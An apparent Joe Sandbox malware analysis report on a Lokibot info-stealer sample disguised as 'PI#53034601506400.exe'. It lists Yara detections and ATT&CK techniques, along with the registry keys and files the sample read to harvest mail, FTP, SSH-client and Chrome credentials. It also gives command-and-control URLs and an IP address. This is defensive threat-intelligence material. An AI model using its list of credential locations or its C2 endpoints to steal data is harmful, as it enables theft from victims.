              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Lokibot
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI#53034601506400.exe PID: 5988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: PI#53034601506400.exe PID: 2312, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\PI#53034601506400.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\Desktop\PI#53034601506400.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\PI#53034601506400.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\PI#53034601506400.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PI#53034601506400.exe.3525928.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath Interception111
              Process Injection              		1
              Masquerading              		2
              OS Credential Dumping              		111
              Security Software Discovery              		Remote Services1
              Email Collection              		Exfiltration Over Other Network Medium1
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Disable or Modify Tools              		1
              Input Capture              		31
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Input Capture              		Exfiltration Over Bluetooth1
              Non-Application Layer Protocol              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
              Virtualization/Sandbox Evasion              		1
              Credentials in Registry              		1
              Application Window Discovery              		SMB/Windows Admin Shares1
              Archive Collected Data              		Automated Exfiltration111
              Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
              Process Injection              		NTDS13
              System Information Discovery              		Distributed Component Object Model2
              Data from Local System              		Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common12
              Software Packing              		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Timestomp              		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PI#53034601506400.exe10%ReversingLabsByteCode-MSIL.Packed.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              1.0.PI#53034601506400.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.PI#53034601506400.exe.3525928.5.unpack100%AviraHEUR/AGEN.1244307Download File
              0.2.PI#53034601506400.exe.38976c0.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.founder.com.cn/cnQ0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.founder.com.cn/cnU0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/:0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/50%URL Reputationsafe
              http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.de0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/I0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.founder.com.cn/cn/0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cnGg0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
              http://www.sajatypeworks.com70%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/Y0m0%Avira URL Cloudsafe
              http://www.urwpp.deu40%Avira URL Cloudsafe
              http://www.fontbureau.comm0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.founder.com.cn/cnion0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/d0%URL Reputationsafe
              http://www.founder.com.cn/cno_0%Avira URL Cloudsafe
              http://www.fontbureau.comgrita50%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://kbfvzoboss.bid/alien/fre.phptrue
              • URL Reputation: safe
              		unknown
              http://alphastand.top/alien/fre.phptrue
              • URL Reputation: safe
              		unknown
              http://alphastand.win/alien/fre.phptrue
              • URL Reputation: safe
              		unknown
              http://alphastand.trade/alien/fre.phptrue
              • URL Reputation: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.fontbureau.com/designersGPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.founder.com.cn/cnQPI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers/?PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.founder.com.cn/cn/bThePI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers?PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.ibsensoftware.com/PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.com7PI#53034601506400.exe, 00000000.00000003.306344407.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.306358549.0000000005A4D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.founder.com.cn/cnUPI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.tiro.comPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designersPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.goodfont.co.krPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/jp/:PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.sajatypeworks.comPI#53034601506400.exe, 00000000.00000003.306344407.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.306358549.0000000005A4D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.typography.netDPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cn/cThePI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.galapagosdesign.com/staff/dennis.htmPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.urwpp.deu4PI#53034601506400.exe, 00000000.00000003.311913695.0000000005A58000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://fontfabrik.comPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/5PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp//PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/Y0mPI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.galapagosdesign.com/DPleasePI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/pe.MPI#53034601506400.exe, 00000000.00000003.312213384.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.312084396.0000000005A58000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fonts.comPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.sandoll.co.krPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.urwpp.deDPleasePI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.urwpp.dePI#53034601506400.exe, 00000000.00000003.311913695.0000000005A58000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.zhongyicts.com.cnPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePI#53034601506400.exe, 00000000.00000002.328171471.00000000024E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.sakkal.comPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://centos.orgPI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.apache.org/licenses/LICENSE-2.0PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.comPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://apache.orgPI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/IPI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/jp/PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnGgPI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.carterandcone.comlPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.centos.org/PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cnionPI#53034601506400.exe, 00000000.00000003.308277205.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308234434.0000000005A6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.founder.com.cn/cnPI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308277205.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308234434.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlPI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/rPI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310333869.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://httpd.apache.org/PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/pe.PI#53034601506400.exe, 00000000.00000003.312172741.0000000005A58000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cno_PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.commPI#53034601506400.exe, 00000000.00000003.325770393.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comgrita5PI#53034601506400.exe, 00000000.00000003.325770393.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/dPI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                162.0.223.13
                                                		unknownCanada
                                                		35893ACPCAtrue

                                                General Information

                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                Analysis ID:708241
                                                Start date and time:2022-09-23 07:57:19 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 5m 35s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:PI#53034601506400.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:2
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 11
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Stop behavior analysis, all processes terminated

                                                Warnings

                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                07:58:29API Interceptor77x Sleep call for process: PI#53034601506400.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                162.0.223.13Awb# 8457108962.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?5387165893178318742
                                                QT 70090.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?rujsZEinqQuPZBS8kKnSq21shtrtBBS26bv5QNtgEY6EzZMUJaM9cOCuh3YSFQVL2qQSek9TifxRfkMYuy8HmK
                                                DHL Receipt.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?loop
                                                SecuriteInfo.com.Win32.PWSX-gen.9464.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?05315
                                                Product Inquiry.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?loop
                                                PEMBAYARAN COPY TT.PDF.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?1x0weqsk
                                                PR22080090.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?rujsZEinqQuPZBS8kKnSq21shtrtBBS26bv5QNtgEY6EzZMUJaM9cOCuh3YSFQVL2qQSek9TifxRfkMYuy8HmK
                                                gunzipped.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?0x0x0x0x
                                                DHL Express Shipping Documents.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?05315
                                                Icfawwwwei.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?bnpLdK1qC8nCN5xlQDEq5D1XsPHLRuX3RmP57RvKZTmNY
                                                CargoReleaseManagement.pdf.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?1x0weqsk
                                                SecuriteInfo.com.HEUR.Backdoor.Win32.Androm.gen.9512.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?mtJdcTTgTiDS3qDN89cx57YXuOTiaxsx1bKd4EuYX
                                                Inquiry.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?liARodoeAoISHzlzjUctUnGGtWs
                                                SecuriteInfo.com.NSIS.Injector.AOW.tr.14199.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?KuOatnJixfa4FrBhDarNcHi2oNagjKp4eeeICY
                                                SecuriteInfo.com.NSIS.Injector.AOW.tr.19074.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?5566589175702602
                                                Swift_Copy_10.docx.docGet hashmaliciousBrowse
                                                • 162.0.223.13/?liARodoeAoISHzlzjUctUnGGtWs
                                                SecuriteInfo.com.Trojan.MSIL.Basic.5.Gen.24626.25568.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?05315
                                                Contract Inquiry.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?liARodoeAoISHzlzjUctUnGGtWs
                                                Contract Inquiry.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?liARodoeAoISHzlzjUctUnGGtWs
                                                DHL Express AWB & Invoice.exeGet hashmaliciousBrowse
                                                • 162.0.223.13/?1zVKJFh880sWxDKag7keBgEa7OtXS24

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                ACPCAAwb# 8457108962.exeGet hashmaliciousBrowse
                                                • 162.0.223.13
                                                QT 70090.exeGet hashmaliciousBrowse
                                                • 162.0.223.13
                                                14RgKWpux6.exeGet hashmaliciousBrowse
                                                • 162.0.217.254
                                                6M0J16YJKr.exeGet hashmaliciousBrowse
                                                • 162.0.217.254
                                                10935009_pdf.jsGet hashmaliciousBrowse
                                                • 162.0.213.190
                                                mpsl-20220922-1225.elfGet hashmaliciousBrowse
                                                • 162.54.102.137
                                                Tz85pczfb8.exeGet hashmaliciousBrowse
                                                • 162.0.213.190
                                                S8R1ga8Uqo.exeGet hashmaliciousBrowse
                                                • 162.0.217.254
                                                DHL Receipt.exeGet hashmaliciousBrowse
                                                • 162.0.223.13
